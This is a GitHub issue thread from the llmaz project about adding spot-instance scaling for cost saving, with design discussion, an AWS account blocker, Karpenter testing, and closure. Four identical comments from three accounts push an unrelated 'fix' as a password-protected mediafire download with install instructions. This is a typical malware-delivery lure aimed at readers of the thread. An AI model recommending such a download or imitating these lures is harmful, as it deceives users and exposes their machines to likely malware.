### ISSUE TITLE
Support scaling with Spot instances for cost saving

### ISSUE THREAD

**Issue by kerthcet** [InftyAI/llmaz#106]
**What would you like to be added**:

See https://github.com/spotinst as an example, which means we should support multi cloud providers. 

**Why is this needed**:

Cost saving for users.

**Completion requirements**:

This enhancement requires the following artifacts:

- [ ] Design doc
- [ ] API change
- [ ] Docs update

The artifacts should be linked in subsequent comments.

**Comment by ahmar7** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by ahmar7** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by MirsonMboa** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by NikhilKumar77777** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by kerthcet** [comment]
Any progress on this? We're approaching the deadline, end of this monty clearly.

**Comment by carlory** [comment]
It was blocked by the limitation of the aws account. And aws team approved my request. I will test the intergation with karpenter again today.

![Image](https://github.com/user-attachments/assets/287c8845-3a99-48c4-a761-d5412821caf6)

**Comment by kerthcet** [comment]
Great to hear this.

**Comment by kerthcet** [comment]
Have an offline discussion with @carlory , the generally design is almost done, but how to map the Pods to the specified nodepools. I think we can have a simple proposal for this to help understand the total design.

**Comment by carlory** [comment]
@kerthcet, we need to add a doc to tell users how to use it.

**Comment by kerthcet** [comment]
/close
as completed.
